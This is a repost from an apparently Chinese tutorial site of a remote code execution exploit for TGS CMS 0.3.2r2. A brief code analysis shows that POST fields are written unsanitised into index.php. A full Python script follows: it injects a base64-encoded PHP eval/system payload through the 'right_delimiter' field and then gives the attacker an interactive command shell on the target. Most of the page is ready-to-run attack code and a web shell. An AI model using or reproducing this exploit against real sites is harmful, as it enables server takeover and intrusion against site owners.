手机
当前位置:查字典教程网 >网络安全 >Exploit >TGS CMS 0.3.2r2 Remote Code Execution Exploit
TGS CMS 0.3.2r2 Remote Code Execution Exploit
摘要:#TGSCMSRemoteCodeExecutionExploit#by0in#fromDark-CodersGroup!#www.dark...

# TGS CMS Remote Code Execution Exploit

# by 0in

# from Dark-Coders Group!

# www.dark-coders.pl

# Contact: 0in(dot)email[at]gmail(dot)com

# Greetings to:die_angel,suN8Hclf,m4r1usz,cOndemned,str0ke

# Dork:NULL - because "You cannot kill what you did not create" <- Duality by Slipknot

# Let's analyze the vuln:

# We've got the: /cms/admin/admin.template_engine.php

# first line:"<?"

# next 2-22 lines - comments

# 23: if ($_GET['option'] == "set_template") {

# 24: $filename = "../index.php";

# 25: if ((@is_writeable($filename)) && ($handle = @fopen($filename, "w"))) {

# From 50 line to 88 we have definition of file content

# 50: $content = '<?php // here programmer define the file to save in "../index.php"

# but...

# he.. don't think xD

# 77:$tgs_template->template_dir = "'.$_POST['template_dir'].'";

# 78:$tgs_template->config_dir = "'.$_POST['config_dir'].'";

# 79:$tgs_template->cms_dir = "'.$_POST['cms_dir'].'";

# 80:$tgs_template->left_delimiter = "'.$_POST['left_delimiter'].'";

# 81:$tgs_template->right_delimiter = "'.$_POST['right_delimiter'].'";

# And.. boom!

# 89: if (@fwrite($handle,$content)) {

# Just simply exploit for fun:

import httplib

import urllib

print "TGS CMS Remote Code Execution Exploit"

print "by 0in From Dark-Coders Group"

print "www.dark-coders.pl"

print 'Enter target:'

target=raw_input()

print 'Enter path:'

path=raw_input()

inject="";error_reporting(0);eval(base64_decode("JGNtZD0kX0dFVFsnenVvJ107c3lzdGVtKCRjbWQpO2V4aXQ7"));//"

exploit=httplib.HTTPConnection(target ':80')

headers={'Content-type':'application/x-www-form-urlencoded',"Accept":"text/plain"}

data=urllib.urlencode({'right_delimiter':inject})

exploit.request("POST",path "/cms/admin/admin.template_engine.php?option=set_template",data,headers)

print exploit.getresponse().read()

while(1):

cmd=raw_input("[shell@" target "]#")

if(cmd=='exit'):

quit()

shell=httplib.HTTPConnection(target ':80')

shell.request("GET",path "/cms/index.php?zuo=" cmd)

print shell.getresponse().read()

【TGS CMS 0.3.2r2 Remote Code Execution Exploit】相关文章:

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)

LoveCMS 1.6.2 Final Update Settings Remote Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

minb 0.1.0 Remote Code Execution Exploit

Belkin wireless G router ADSL2 modem Auth Bypass Exploit

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

精品推荐
分类导航